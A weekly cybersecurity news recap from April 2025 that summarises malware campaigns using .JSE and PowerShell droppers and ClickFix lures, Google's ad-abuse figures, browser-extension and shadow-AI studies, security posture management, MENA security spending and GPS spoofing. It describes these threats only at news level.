Weekly Cybersecurity Recap - 21 April 2025

Introduction

This week’s cybersecurity landscape featured a wave of diverse threats and shifting strategies: from multi-stage malware campaigns exploiting simple email lures to surging GPS spoofing attacks disrupting flight paths. We also saw a steep rise in unapproved AI use across enterprises, concerning ad abuse numbers from Google, and growing attention on security posture management and browser extension risk. Let’s dive into this week’s most important updates.

Malware & Threat Campaigns

Multi-Stage Malware Attack Uses .JSE and PowerShell to Deploy Agent Tesla and XLoader

A newly observed multi-stage attack chain is being used to deploy multiple malware strains including Agent Tesla, Remcos RAT, and XLoader. The attack starts with a phishing email posing as a payment confirmation, luring users into opening a malicious 7-zip file. The archive contains a JavaScript Encoded (.JSE) file, which, when launched, initiates a download of a PowerShell script from an external server. This script acts as a second-stage dropper, triggering the final malware payload.

State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns

Threat actors are actively using the ClickFix technique in targeted malware operations. Previously associated with cybercriminal groups, ClickFix is now being adopted by nation-state actors like TA427 (Kimsuky), TA450 (MuddyWater), and APT28. The approach leverages social engineering through fake prompts or login challenges to compromise victims. The TA450 campaign, in particular, has targeted sectors like finance, healthcare, and government across the U.S., Europe, and the Middle East, with a heavy focus on the U.A.E. and Saudi Arabia.

Ad Abuse & Digital Fraud

Google Blocked 5.1B Harmful Ads and Suspended 39.2M Advertiser Accounts in 2024

In its 2024 ad safety report, Google said it blocked 5.1 billion malicious ads and suspended over 39 million advertiser accounts. These accounts were primarily flagged for scam activity, legal violations, or trademark abuse. Top violations included ad network abuse, financial scams, and misrepresentation. The company also restricted ads on 1.3 billion web pages. The scale of enforcement highlights ongoing abuse of digital ad infrastructure as a vehicle for fraud and malware distribution.

Security Research & Insights

Majority of Browser Extensions Can Access Sensitive Enterprise Data, New Report Finds

A report from LayerX uncovers that a significant number of browser extensions pose a security risk to enterprises due to over-permission. The analysis combines public marketplace stats with enterprise telemetry, offering a real-world view into the hidden threat surface. It raises red flags about developers' trustworthiness and the kinds of permissions being granted — pointing to a need for IT teams to re-evaluate browser governance policies.

The Shadow AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools

An enterprise AI study from Software AG shows that half of workers are using unapproved AI tools at work. Many of these users said they would continue even if banned. This trend reveals a shift from sanctioned tool usage toward personal productivity optimization, driven by the convenience and availability of AI platforms. Experts now urge organizations to move beyond passive monitoring and toward active management of Shadow AI, building guardrails around its inevitable adoption.

Demystifying Security Posture Management

Security Posture Management (SPM) is gaining attention as companies prioritize measurable outcomes over checkbox compliance. With the acquisition spree by major players — Wiz, Avalor, Dassana — the SPM space is heating up. But practitioners remain cautious, asking if these platforms can reduce operational complexity or simply add another layer. The future of SPM depends on its ability to turn posture insights into real, actionable improvements without overwhelming security teams.

Regional & Strategic Trends

Middle East, North Africa Security Spending to Top $3B

Gartner forecasts MENA cybersecurity spending will reach $3.3 billion this year, a 13.7% increase. Growth is being driven by the rapid digitization of industries and rising threats. Security services — especially managed detection, response, and advisory—will lead investment. The data was presented at the recent Gartner Security and Risk Management Summit in Dubai, showing strong commitment by regional organizations to harden cyber defenses.

GPS Spoofing Attacks Spike in Middle East, Southeast Asia

Spoofing attacks on GPS systems are becoming more common in areas like Myanmar, the Middle East, and the India-Pakistan border. These incidents pose serious risks to both military and civilian aviation. An Indian disaster-relief flight was recently affected, raising alarms about aviation safety in conflict-prone areas. These disruptions echo patterns seen in 2024, when jamming and spoofing incidents surged in Eastern Europe and the South China Sea.